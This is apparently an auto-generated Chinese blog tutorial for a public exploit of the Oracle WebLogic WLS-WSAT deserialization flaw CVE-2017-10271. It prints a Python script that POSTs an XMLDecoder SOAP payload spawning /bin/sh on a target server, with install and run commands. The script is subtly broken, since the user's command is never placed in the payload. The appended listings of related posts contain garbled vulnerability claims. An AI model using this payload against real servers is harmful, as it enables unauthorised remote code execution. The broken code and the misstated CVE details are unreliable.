CVE-2017-10271 项目使用教程

于 2024-08-31 09:35:41 发布
阅读量125 收藏 5
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gitblog_00518/article/details/141745098
版权

CVE-2017-10271 项目使用教程

CVE-2017-10271Oracle WebLogic WLS-WSAT Remote Code Execution Exploit (CVE-2017-10271)项目地址:https://gitcode.com/gh_mirrors/cve/CVE-2017-10271

1. 项目的目录结构及介绍

CVE-2017-10271/
├── README.md
├── exploit.py
└── requirements.txt
  • README.md: 项目说明文件,包含项目的基本信息和使用方法。
  • exploit.py: 项目的主要执行文件,用于执行漏洞利用。
  • requirements.txt: 项目依赖文件,列出了运行该项目所需的Python包。

2. 项目的启动文件介绍

exploit.py

exploit.py 是项目的主要执行文件,用于执行针对 CVE-2017-10271 漏洞的利用。以下是该文件的主要功能和使用方法:

import requests
import sys

def exploit(url, cmd):
    payload = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
          <java version="1.8" class="java.beans.XMLDecoder">
            <void class="java.lang.ProcessBuilder">
              <array class="java.lang.String" length="2">
                <void index="0">
                  <string>/bin/sh</string>
                </void>
                <void index="1">
                  <string>-c</string>
                </void>
              </array>
              <void method="start"/>
            </void>
          </java>
        </work:WorkContext>
      </soapenv:Header>
      <soapenv:Body/>
    </soapenv:Envelope>"""

    headers = {
        'Content-Type': 'text/xml',
    }

    response = requests.post(url, data=payload, headers=headers)
    print(response.text)

if __name__ == '__main__':
    if len(sys.argv) != 3:
        print("Usage: python exploit.py <target_url> <command>")
        sys.exit(1)

    url = sys.argv[1]
    cmd = sys.argv[2]
    exploit(url, cmd)

使用方法

  1. 安装所需的依赖包:

    pip install -r requirements.txt

  2. 运行漏洞利用脚本:

    python exploit.py <target_url> <command>

    例如:

    python exploit.py http://example.com/wls-wsat/CoordinatorPortType "ls -la"

3. 项目的配置文件介绍

requirements.txt

requirements.txt 文件列出了运行该项目所需的Python包,内容如下:

requests
  • requests: 用于发送HTTP请求的Python库。

通过安装这些依赖包,可以确保 exploit.py 脚本能够正常运行。

pip install -r requirements.txt

以上是 CVE-2017-10271 项目的使用教程,包含了项目的目录结构、启动文件和配置文件的详细介绍。希望这些信息能帮助你更好地理解和使用该项目。

CVE-2017-10271Oracle WebLogic WLS-WSAT Remote Code Execution Exploit (CVE-2017-10271)项目地址:https://gitcode.com/gh_mirrors/cve/CVE-2017-10271

戚巧琚Ellen
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
CVE-2020-14644 iiop反序列化漏洞分析1
08-03
- **IDEA项目创建**:在IDEA中新建一个工程,将coherence.jar和wlfullclient.jar放入同一目录,并添加到项目库中,以便进行进一步分析和测试。 ### 二、关键反序列化类分析 此次漏洞的关键在于`RemoteConstructor...
GitHack-master.rar
01-06
GitHack-master 是一个压缩包,很可能包含了一个名为 "GitHack" 的项目的源代码或工具集。这个项目可能专注于利用Git进行安全研究或者提供与Git相关的安全审计和防护工具。Git是世界上最流行的分布式版本控制系统,...
struts-2.2.3.7z
11-14
然而,值得注意的是,Struts 2的后续版本中出现了一些高知名度的安全漏洞,如著名的CVE-2017-5638“Struts Shiro远程命令执行漏洞”,这提醒我们即使使用开源框架,也需要保持及时更新,确保系统的安全性。...
TPscan-master.7z
01-27
5. **许可证文件**:开源项目通常包含LICENSE文件,明确了软件的使用许可条款,确保用户合法合规地使用工具。 6. **脚本和配置文件**:可能包含预设的扫描脚本和配置文件,用户可以根据自己的需求调整这些文件,...
【Ubuntu20.04.06 最新详细安装(虚拟机版)Linux系统分区 飞控开发环境搭建】
09-15
在本教程中,我们将深入探讨如何在虚拟机中安装最新的Ubuntu 20.04.06 LTS(长期支持版)操作系统,同时设置适合飞控开发的环境。首先,我们需要了解Linux系统的分区策略,以及如何准备必要的安装工具。 1. **EFI...
高分项目-红包抽奖v版小程序源码(优秀毕业设计源码).zip
08-30
1. 精选系统小程序代码说明:经导师指导并认可通过的98分毕设项目代码。 2.适用对象:本代码学习资料适用于计算机、电子信息工程、数学等专业正在做毕设的学生,需要项目实战练习的学习者,也适用于课程设计、期末大作业。 3.技术栈:java,项目代码都经过严格调试,代码没有任何bug! 4. 作者介绍:大厂码农,java领域创作者,阿里云开发社区乘风者计划专家博主,专注于大学生项目实战开发,文章底部有博主联系方式,更多优质系统、项目定制请私信。 5. 最新计算机软件毕业设计选题大全: https://blog.csdn.net/weixin_45630258/article/details/135901374
1999-2022年中国基本单位统计(全新整理)
08-30
1、资源内容地址:https://blog.csdn.net/2301_79696294/article/details/141336945 2、代码特点:今年全新,手工精心整理,放心引用,数据来自权威,相对于其他人的控制变量数据准确很多,适合写论文做实证用 ,不会出现数据造假问题 3、适用对象:大学生,本科生,研究生小白可用,容易上手!!! 3、课程引用: 经济学,地理学,城市规划与城市研究,公共政策与管理,社会学,商业与管理 制定政策的参考,也是企业生产经营及投资决策和科研机构、大专院校进行科研及教学活动的辅助资料。
Java项目:基于SSM框架+mysql实现的楼房销售系统含源码和毕业论文(ssm+mysql+jsp+b/s+maven)
08-30
一、项目简介 本项目是一套基于SSM框架+mysql楼房销售系统含源码和毕业论文 包含:项目源码、数据库脚本等,该项目附带全部源码可作为毕设使用。 二、技术实现 jdk版本:1.8 及以上 ide工具:IDEA或者eclipse 数据库: mysql5.5及以上 后端:spring+springmvc+mybatis+maven+mysql 前端:jsp,css,js 三、系统功能 1、系统角色主要包括:管理员、员工、客户 2、系统功能 主要功能包括: 首页 个人中心 修改密码 个人信息 员工管理 客户管理 房屋管理 房屋留言管理 房屋收藏管理 房屋订单管理 新闻管理 单页数据管理 户型类型管理 新闻类型管理 轮播图管理 前台主要功能包括: 用户登录 用户注册 首页 楼盘介绍 公司介绍 房屋信息展示 房屋详情 点我收藏 立即预订 发表留言 新闻资讯 个人中心 房屋收藏 房屋订单 跳转到后台等功能
高分项目-高的地图实时天气小程序源码(优秀毕业设计源码).zip
08-30
1. 精选系统小程序代码说明:经导师指导并认可通过的98分毕设项目代码。 2.适用对象:本代码学习资料适用于计算机、电子信息工程、数学等专业正在做毕设的学生,需要项目实战练习的学习者,也适用于课程设计、期末大作业。 3.技术栈:java,项目代码都经过严格调试,代码没有任何bug! 4. 作者介绍:大厂码农,java领域创作者,阿里云开发社区乘风者计划专家博主,专注于大学生项目实战开发,文章底部有博主联系方式,更多优质系统、项目定制请私信。 5. 最新计算机软件毕业设计选题大全: https://blog.csdn.net/weixin_45630258/article/details/135901374
A-simple-start-for-any-STM32-based-project.-STM32-base.zip
最新发布
08-30
anaconda安装 A_simple_start_for_any_STM32_based_project._STM32-base.zip A_simple_start_for_any_STM32_based_project._STM32-base.zip A_simple_start_for_any_STM32_based_project._STM32-base.zip A_simple_start_for_any_STM32_based_project._STM32-base.zip A_simple_start_for_any_STM32_based_project._STM32-base.zip A_simple_start_for_any_STM32_based_project._STM32-base.zip
海康DS-7808N-SNH萤石云升级包,版本:V3.0.17 build 150804,升级程序不能解绑萤石云
08-30
海康DS-7808N-SNH DS-7804N-SNH 萤石云升级包,版本:V3.0.17 build 150804,升级程序不能解绑萤石云。 程序包适用于以下型号: DS-7804N-SNH DS-7808N-SNH 特别声明: 版本号:V3.0.17 build 150804 设备升级有风险,请确认是否一定要升级设备。 请确认升级程序包是否适用于您的设备。 在设备升级过程中请勿断电。
高分项目-口碑外卖点餐小程序源码(优秀毕业设计源码).zip
08-30
1. 精选系统小程序代码说明:经导师指导并认可通过的98分毕设项目代码。 2.适用对象:本代码学习资料适用于计算机、电子信息工程、数学等专业正在做毕设的学生,需要项目实战练习的学习者,也适用于课程设计、期末大作业。 3.技术栈:java,项目代码都经过严格调试,代码没有任何bug! 4. 作者介绍:大厂码农,java领域创作者,阿里云开发社区乘风者计划专家博主,专注于大学生项目实战开发,文章底部有博主联系方式,更多优质系统、项目定制请私信。 5. 最新计算机软件毕业设计选题大全: https://blog.csdn.net/weixin_45630258/article/details/135901374
非线性模型线性化方法和技巧
08-30
这里整合了在网上找到的一些非线性模型线性化方法和技巧。
基于MATLAB卡尔曼小球运动跟踪系统GUI设计.zip
08-30
七维大脑
java集合面试题,包含了面试常问问题
08-30
包含java面试中关于集合常问的问题
基于springboot大学生入学审核系统的设计与实现.docx
08-30
基于springboot大学生入学审核系统的设计与实现.docx
Scratch少儿编程项目音效音乐素材-动物音效-动物-其他.zip
08-30
Scratch少儿编程项目音效音乐素材-动物音效-动物-其他.zip
2000-2022年中国城市/县域统计面板数据二合一(全新整理)
08-30
1、资源内容地址:https://blog.csdn.net/2301_79696294/article/details/141309165 2、代码特点:今年全新,手工精心整理,放心引用,数据来自权威,相对于其他人的控制变量数据准确很多,适合写论文做实证用 ,不会出现数据造假问题 3、适用对象:大学生,本科生,研究生小白可用,容易上手!!! 3、课程引用: 经济学,地理学,城市规划与城市研究,公共政策与管理,社会学,商业与管理 数据范围:2000-2021年,包括300多个城市 样本数量:140w+
高分项目-机器人兔兔小程序源码(优秀毕业设计源码).zip
08-30
1. 精选系统小程序代码说明:经导师指导并认可通过的98分毕设项目代码。 2.适用对象:本代码学习资料适用于计算机、电子信息工程、数学等专业正在做毕设的学生,需要项目实战练习的学习者,也适用于课程设计、期末大作业。 3.技术栈:java,项目代码都经过严格调试,代码没有任何bug! 4. 作者介绍:大厂码农,java领域创作者,阿里云开发社区乘风者计划专家博主,专注于大学生项目实战开发,文章底部有博主联系方式,更多优质系统、项目定制请私信。 5. 最新计算机软件毕业设计选题大全: https://blog.csdn.net/weixin_45630258/article/details/135901374
以下Weblogic漏洞为反序列化的有 (2分) A CVE-2017-10271 B CVE-2018-2628 C CVE-2014-4210 D CVE-2017-3506
06-08
以下Weblogic漏洞为反序列化的有A CVE-2017-10271、B CVE-2018-2628和D CVE-2017-3506。 WebLogic Server是一款流行的Java应用服务器,由Oracle公司开发和维护。WebLogic Server的反序列化漏洞是一种常见的安全漏洞,攻击者可以通过构造恶意序列化数据,从而实现远程代码执行、绕过身份验证等攻击。 以下是反序列化漏洞的相关信息: A. CVE-2017-10271:WebLogic Server WLS-WSAT组件反序列化漏洞,攻击者可以通过构造特定的HTTP请求,实现远程代码执行。 B. CVE-2018-2628:WebLogic Server T3协议反序列化漏洞,攻击者可以通过构造特定的T3协议请求,实现远程代码执行。 C. CVE-2014-4210:WebLogic Server SSRF漏洞,攻击者可以通过构造恶意请求,访问内部网络资源。 D. CVE-2017-3506:WebLogic Server WLS Security组件反序列化漏洞,攻击者可以通过构造特定的HTTP请求,实现绕过身份验证。 因此,选项A、B和D是反序列化漏洞。 答案:A、B、D。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

戚巧琚Ellen

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值